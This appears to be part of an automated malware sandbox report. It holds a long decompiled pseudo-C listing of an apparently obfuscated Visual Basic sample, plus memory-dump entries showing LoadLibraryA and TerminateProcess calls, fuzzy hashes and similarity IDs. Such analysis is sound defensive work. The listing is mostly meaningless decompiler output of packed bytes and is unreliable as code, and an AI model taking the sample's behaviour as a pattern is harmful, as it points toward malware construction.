                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				 *_t55 =  *_t55 + 0x2b;
                                                        				_t57 = _t55 - 0x00000001 & 0x25100000;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				 *0x6f635300 =  *0x6f635300 + 0xfd68146;
                                                        				_t103 =  *0x6f635300;
                                                        				if(_t103 < 0) {
                                                        					L3:
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t85;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t76 =  *_t76 + _t57;
                                                        					 *((intOrPtr*)(_t57 + _t57)) =  *((intOrPtr*)(_t57 + _t57)) + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					L4:
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *((intOrPtr*)(_t57 + 0x800000)) =  *((intOrPtr*)(_t57 + 0x800000)) + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *((char*)(_t57 + 0x8000)) =  *((char*)(_t57 + 0x8000));
                                                        					 *_t57 =  *_t57 + 0x80;
                                                        					 *((intOrPtr*)(_t57 - 0x7fffff80)) =  *((intOrPtr*)(_t57 - 0x7fffff80)) + _t57;
                                                        					 *((char*)(_t57 - 0x3f3f4000)) =  *((char*)(_t57 - 0x3f3f4000));
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					_t70 = 0xac;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + 1;
                                                        					asm("invalid");
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					asm("invalid");
                                                        					 *_t57 =  *_t57 + 1;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					 *_t57 =  *_t57 + _t57;
                                                        					while(1) {
                                                        						L5:
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t57 =  *_t57 + _t57;
                                                        						 *_t76 =  *_t76 + _t76;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *((intOrPtr*)(_t89 + 0x9b)) =  *((intOrPtr*)(_t89 + 0x9b)) + _t85;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0x0000B089 =  *0x0000B089 | _t89;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						 *0 =  *0;
                                                        						_t57 = 0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						 *0x778b9b =  *0x778b9b;
                                                        						_t70 = 0x8b;
                                                        						_t76 =  *0x0000B813;
                                                        						while(1) {
                                                        							 *_t89 = _t85;
                                                        							 *_t70 =  *_t70 + _t76;
                                                        							if( *_t70 != 0) {
                                                        								goto L5;
                                                        							}
                                                        							 *_t57 =  *_t57 + _t57;
                                                        							 *((intOrPtr*)(_t89 - 0x67474848)) =  *((intOrPtr*)(_t89 - 0x67474848)) + _t85;
                                                        							 *_t70 =  *_t70 +  *((intOrPtr*)(_t70 + 0xb08b7b));
                                                        							_t76 =  *((intOrPtr*)(_t70 - 0x47474778));
                                                        							 *0xFFFFFFFFB8B96970 =  *0xFFFFFFFFB8B96970 | _t70;
                                                        							_t57 = 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							_t89 =  *(_t70 - 0x45);
                                                        							if( *0x80b9b8 != 0) {
                                                        								continue;
                                                        							}
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							 *0x80b9b8 =  *0x80b9b8 + 0x80b9b8;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("invalid");
                                                        							 *0x80b9b8 =  *0x80b9b8 + 1;
                                                        							asm("out 0xff, eax");
                                                        						}
                                                        					}
                                                        				}
                                                        				asm("o16 jnz 0x6f");
                                                        				asm("outsb");
                                                        				if(_t103 >= 0) {
                                                        					goto L4;
                                                        				}
                                                        				_t61 = _t57 | 0x55001101;
                                                        				_t92 = _t90;
                                                        				_t100 = _t99 - 1;
                                                        				_t101 = _t100 - 1;
                                                        				_t76 = _t101;
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *_t61 =  *_t61 + _t61;
                                                        				_t85 = _t85 + 2;
                                                        				 *_t85 =  *_t85 + 0xde;
                                                        				asm("scasb");
                                                        				_t62 = _t61 & 0x00000000;
                                                        				 *((intOrPtr*)(_t101 +  *0x2b + _t92 * 2)) =  *((intOrPtr*)(_t101 +  *0x2b + _t92 * 2)) + 0xfd68146;
                                                        				 *((intOrPtr*)(_t92 + 0x24)) =  *((intOrPtr*)(_t92 + 0x24)) + 0xde;
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *0x2b =  *0x2b + 0x2b;
                                                        				 *_t62 =  *_t62 + 0x2b;
                                                        				asm("sbb [eax], dl");
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *((intOrPtr*)(_t62 + _t62)) =  *((intOrPtr*)(_t62 + _t62)) + 0x2b;
                                                        				0x36401460(_t100, 0x2b, _t85, _t99);
                                                        				 *_t62 =  *_t62 + 0x2b;
                                                        				 *_t62 =  *_t62 + 0x2b;
                                                        				asm("sbb [eax], al");
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *_t62 =  *_t62 + 0xfd68146;
                                                        				_t63 = _t62 + 0xfd68146;
                                                        				_push(es);
                                                        				 *_t63 =  *_t63 + 0x2b;
                                                        				_push(es);
                                                        				_t57 = _t63;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				asm("sbb [eax], al");
                                                        				 *0xfd68147 =  *0xfd68147 + 0x2b;
                                                        				 *_t57 =  *_t57 + 0xde;
                                                        				 *((intOrPtr*)(_t57 - 0x69fffff7)) =  *((intOrPtr*)(_t57 - 0x69fffff7)) + 0xfd68146;
                                                        				asm("adc [eax], eax");
                                                        				 *_t57 =  *_t57 + 0xfd68146;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				 *_t57 =  *_t57 + 0x2b;
                                                        				goto L3;
                                                        			}






















                                                        0x00401360
                                                        0x00401365
                                                        0x0040136a
                                                        0x0040136c
                                                        0x0040136e
                                                        0x00401370
                                                        0x00401372
                                                        0x00401374
                                                        0x00401375
                                                        0x00401377
                                                        0x00401379
                                                        0x0040137e
                                                        0x00401387
                                                        0x00401389
                                                        0x0040138b
                                                        0x0040138c
                                                        0x0040138e
                                                        0x00401390
                                                        0x00401392
                                                        0x00401394
                                                        0x00401396
                                                        0x00401398
                                                        0x0040139a
                                                        0x004013a3
                                                        0x004013a4
                                                        0x004013a5
                                                        0x004013a6
                                                        0x004013a7
                                                        0x004013aa
                                                        0x004013ab
                                                        0x004013ac
                                                        0x004013ae
                                                        0x004013b0
                                                        0x004013b2
                                                        0x004013b4
                                                        0x004013ba
                                                        0x004013bc
                                                        0x004013bf
                                                        0x004013c1
                                                        0x004013c8
                                                        0x004013c9
                                                        0x004013ca
                                                        0x004013d0
                                                        0x004013d0
                                                        0x004013d6
                                                        0x004013d7
                                                        0x004013e0
                                                        0x004013e1
                                                        0x004013e4
                                                        0x004013e5
                                                        0x004013e7
                                                        0x004013e9
                                                        0x004013eb
                                                        0x004013ed
                                                        0x004013ef
                                                        0x004013f1
                                                        0x004013f3
                                                        0x004013f5
                                                        0x004013f7
                                                        0x004013f9
                                                        0x004013fb
                                                        0x004013fd
                                                        0x004013ff
                                                        0x00401401
                                                        0x00401403
                                                        0x00401405
                                                        0x00401407
                                                        0x0040140a
                                                        0x0040140f
                                                        0x00401411
                                                        0x00401411
                                                        0x00401417
                                                        0x00401487
                                                        0x00401487
                                                        0x00401489
                                                        0x0040148b
                                                        0x0040148d
                                                        0x0040148f
                                                        0x00401492
                                                        0x00401493
                                                        0x00401493
                                                        0x00401495
                                                        0x00401497
                                                        0x00401499
                                                        0x0040149b
                                                        0x0040149d
                                                        0x0040149f
                                                        0x004014a1
                                                        0x004014a3
                                                        0x004014a5
                                                        0x004014a7
                                                        0x004014a9
                                                        0x004014ab
                                                        0x004014ad
                                                        0x004014af
                                                        0x004014b5
                                                        0x004014b7
                                                        0x004014be
                                                        0x004014c1
                                                        0x004014c7
                                                        0x004014ce
                                                        0x004014d0
                                                        0x004014d4
                                                        0x004014d6
                                                        0x004014d8
                                                        0x004014da
                                                        0x004014dc
                                                        0x004014de
                                                        0x004014e0
                                                        0x004014e2
                                                        0x004014e4
                                                        0x004014e6
                                                        0x004014e8
                                                        0x004014ea
                                                        0x004014ec
                                                        0x004014ee
                                                        0x004014f0
                                                        0x004014f2
                                                        0x004014f4
                                                        0x004014f6
                                                        0x004014f8
                                                        0x004014fa
                                                        0x004014fc
                                                        0x004014fe
                                                        0x00401500
                                                        0x00401502
                                                        0x00401504
                                                        0x00401506
                                                        0x00401508
                                                        0x0040150a
                                                        0x0040150a
                                                        0x0040150a
                                                        0x0040150c
                                                        0x0040150e
                                                        0x00401510
                                                        0x00401512
                                                        0x00401514
                                                        0x00401516
                                                        0x00401518
                                                        0x0040151a
                                                        0x0040151c
                                                        0x0040151e
                                                        0x00401520
                                                        0x00401522
                                                        0x00401524
                                                        0x00401526
                                                        0x00401528
                                                        0x0040152a
                                                        0x0040152c
                                                        0x0040152e
                                                        0x00401530
                                                        0x00401532
                                                        0x00401534
                                                        0x00401536
                                                        0x0040153a
                                                        0x0040153c
                                                        0x0040153e
                                                        0x00401540
                                                        0x00401542
                                                        0x00401548
                                                        0x0040154a
                                                        0x0040154c
                                                        0x0040154e
                                                        0x00401554
                                                        0x00401556
                                                        0x00401558
                                                        0x0040155a
                                                        0x0040155f
                                                        0x00401561
                                                        0x00401563
                                                        0x0040156b
                                                        0x0040156d
                                                        0x0040156f
                                                        0x00401571
                                                        0x00401573
                                                        0x00401575
                                                        0x00401575
                                                        0x0040157b
                                                        0x0040157d
                                                        0x00000000
                                                        0x00000000
                                                        0x00401585
                                                        0x00401587
                                                        0x00401592
                                                        0x004015a0
                                                        0x004015ab
                                                        0x004015b1
                                                        0x004015b6
                                                        0x004015b8
                                                        0x004015bb
                                                        0x00000000
                                                        0x00000000
                                                        0x004015c2
                                                        0x004015c4
                                                        0x004015c6
                                                        0x004015c8
                                                        0x004015ca
                                                        0x004015cc
                                                        0x004015ce
                                                        0x004015d0
                                                        0x004015d2
                                                        0x004015d4
                                                        0x004015d6
                                                        0x004015d8
                                                        0x004015da
                                                        0x004015dc
                                                        0x004015de
                                                        0x004015e0
                                                        0x004015e2
                                                        0x004015e4
                                                        0x004015e6
                                                        0x004015e8
                                                        0x004015ea
                                                        0x004015ec
                                                        0x004015ee
                                                        0x004015f0
                                                        0x004015f2
                                                        0x004015f4
                                                        0x004015f6
                                                        0x004015f8
                                                        0x004015fa
                                                        0x004015fc
                                                        0x004015fe
                                                        0x00401600
                                                        0x00401602
                                                        0x00401604
                                                        0x00401606
                                                        0x00401608
                                                        0x0040160a
                                                        0x0040160c
                                                        0x0040160e
                                                        0x00401610
                                                        0x00401612
                                                        0x00401614
                                                        0x00401616
                                                        0x00401618
                                                        0x0040161a
                                                        0x0040161c
                                                        0x0040161e
                                                        0x00401620
                                                        0x00401623
                                                        0x00401623
                                                        0x00401575
                                                        0x0040150a
                                                        0x00401419
                                                        0x0040141c
                                                        0x0040141d
                                                        0x00000000
                                                        0x00000000
                                                        0x00401422
                                                        0x0040142b
                                                        0x0040142d
                                                        0x00401433
                                                        0x00401436
                                                        0x00401437
                                                        0x00401439
                                                        0x0040143b
                                                        0x0040143c
                                                        0x00401440
                                                        0x00401441
                                                        0x00401443
                                                        0x00401447
                                                        0x0040144d
                                                        0x0040144f
                                                        0x00401451
                                                        0x00401453
                                                        0x00401455
                                                        0x00401457
                                                        0x0040145a
                                                        0x0040145f
                                                        0x00401461
                                                        0x00401463
                                                        0x00401465
                                                        0x00401467
                                                        0x00401469
                                                        0x0040146b
                                                        0x0040146c
                                                        0x0040146e
                                                        0x0040146f
                                                        0x00401471
                                                        0x00401473
                                                        0x00401475
                                                        0x00401477
                                                        0x00401479
                                                        0x0040147f
                                                        0x00401481
                                                        0x00401483
                                                        0x00401485
                                                        0x00000000

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247304234.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000000.00000002.247298815.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247324366.0000000000412000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000000.00000002.247336514.0000000000414000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: #100
                                                        • String ID: VB5!6&*
                                                        • API String ID: 1341478452-3593831657
                                                        • Opcode ID: 4c8ab222cc87df943c5b91705abbf1f2e37a94dfe15da0ebf48d89da28344af9
                                                        • Instruction ID: 0ee42a331662020228214c3b1b8e6d799fa73fe16bbaaa2db77919e5b47cc1f5
                                                        • Opcode Fuzzy Hash: 4c8ab222cc87df943c5b91705abbf1f2e37a94dfe15da0ebf48d89da28344af9
                                                        • Instruction Fuzzy Hash: 1E5196A694E7C05FD30347709D2A2A13FB0AE13219B1A45DBD4C2CF0F3E658190ADB72
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoad
                                                        • String ID: rX4
                                                        • API String ID: 1029625771-805084833
                                                        • Opcode ID: d29cd9b4732a0350ca72b778ea24135a71c3c3beb448a0d134e03a209b258795
                                                        • Instruction ID: 6f2b799eba9fc3465e5976ed539d8801e3f4d163ecaabd90ac315f7bb5f7e0ff
                                                        • Opcode Fuzzy Hash: d29cd9b4732a0350ca72b778ea24135a71c3c3beb448a0d134e03a209b258795
                                                        • Instruction Fuzzy Hash: 5721F6F453930AEBCE202A209AA67FF921E9F43794F504117BC4352987DB25C48ACD53
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b715c537c44b22f792f3babd0f587ff397d52a0fe1a898b26971d713db5fcf75
                                                        • Instruction ID: c65378971a08b60570129674e7cadea0c789ab3c639350fe81b3e6dbfe457712
                                                        • Opcode Fuzzy Hash: b715c537c44b22f792f3babd0f587ff397d52a0fe1a898b26971d713db5fcf75
                                                        • Instruction Fuzzy Hash: 86616C30E44347AAEF3439648E987FE125F8F83764FA44516DCCBA35C2D766C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: af4f0585fc045546e1aedeca53325ed0e19748a2969406f8a8c52f3ea40f1c00
                                                        • Instruction ID: 0df490c50c005bccd2cde69f9f17110853609b0ef56b8d99417f8f078b467845
                                                        • Opcode Fuzzy Hash: af4f0585fc045546e1aedeca53325ed0e19748a2969406f8a8c52f3ea40f1c00
                                                        • Instruction Fuzzy Hash: 00616B30A44343AAEF3439648E987FE115E8F83764FA44516DCCBA75C2D726C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: dff6c4e88f94ed6cffb80845b26e38585dc9db71898126c61659f55ade45b4a4
                                                        • Instruction ID: 878aa130bc49372a43ef14646a69a40b4793b5f6777ca4ececb2e045b632fc5a
                                                        • Opcode Fuzzy Hash: dff6c4e88f94ed6cffb80845b26e38585dc9db71898126c61659f55ade45b4a4
                                                        • Instruction Fuzzy Hash: 68516D30A04343AAEF3439248E987FE115E8F83760FE4451ADCCBA75C2D726C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: ccfe6abbb19860fd259560b6c29a8dfc09a024f377883e27620c2463b66f1e0d
                                                        • Instruction ID: 6521820b0b92d8c24dcd2bf4dfb72c9c4ddff935d82046ee30c9e7b79908cac5
                                                        • Opcode Fuzzy Hash: ccfe6abbb19860fd259560b6c29a8dfc09a024f377883e27620c2463b66f1e0d
                                                        • Instruction Fuzzy Hash: AC516C30A04343AAEF3439248D987FE115E8F83764FE4451AECCBA75C2DB26C9868913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 72114d175575765d89f248d775e6e1e156893bcff115c1643858ff15a4f47da1
                                                        • Instruction ID: bcdff7f5e01389f51dd6b924b2d94d2bdec0da33988ce515a9a98c59040d6a45
                                                        • Opcode Fuzzy Hash: 72114d175575765d89f248d775e6e1e156893bcff115c1643858ff15a4f47da1
                                                        • Instruction Fuzzy Hash: 3E518E31E44343AAEF3439148E9C7FE125E8F83764FA4451AECCBA65C2D766C985C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                          • Part of subcall function 02396E41: LoadLibraryA.KERNELBASE(0000D192,082962C8,?,02390846,023905F1,2D9CC76C,DFCB8F12,27AA3188,F21FD920,3E17ADE6,7F21185B,A7C53F01,B314751D,00000000,00000000), ref: 0239724D
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: LibraryLoadProcessTerminate
                                                        • String ID:
                                                        • API String ID: 3349790660-0
                                                        • Opcode ID: 5b322516c4403b3249ca7ab08a6328fbe97dfc7936aa632cbc213f73c3c93b36
                                                        • Instruction ID: 819ffb1fc7e35e329759643ea687357b1e5fa01fb6b72922185fd2afef727a93
                                                        • Opcode Fuzzy Hash: 5b322516c4403b3249ca7ab08a6328fbe97dfc7936aa632cbc213f73c3c93b36
                                                        • Instruction Fuzzy Hash: 1A518031D48343AEEF3539148D9C7FA126A9F83760FA4451AECCBA75C2D726C985C913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 36d8a2d6cfe4119b88b484e789cbb0c1c72b18390020ad54993608e8c6df08ff
                                                        • Instruction ID: d270e904c117daf2d73a1f3079addf9573abc76897ba592aae14a465467cb06c
                                                        • Opcode Fuzzy Hash: 36d8a2d6cfe4119b88b484e789cbb0c1c72b18390020ad54993608e8c6df08ff
                                                        • Instruction Fuzzy Hash: 39417030E44343BDEF3439144E9C7FE115A8F837A4FA4451AECCBA65C1D766C9858913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
                                                        • Opcode ID: 2fd5e60378fb54368e3a6215b2fccfb0864b7f1017bc3c5ab35f9fad52c8e023
                                                        • Instruction ID: 9fa355a3808585887b036f04246cc71223be03297b47262f492986a1f7bd7d51
                                                        • Opcode Fuzzy Hash: 2fd5e60378fb54368e3a6215b2fccfb0864b7f1017bc3c5ab35f9fad52c8e023
                                                        • Instruction Fuzzy Hash: B8416030944343ADEF3439144E9C7FE115A9F837A4FA4451ADCCBA65C1D766C9858913
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        APIs
                                                        • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,02393893,00000004,00000000,?,?,0000084D,8166FD38,?,?,00000000,?), ref: 023941D0
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.247743413.0000000002390000.00000040.00000001.sdmp, Offset: 02390000, based on PE: false
                                                        Similarity
                                                        • API ID: ProcessTerminate
                                                        • String ID:
                                                        • API String ID: 560597551-0
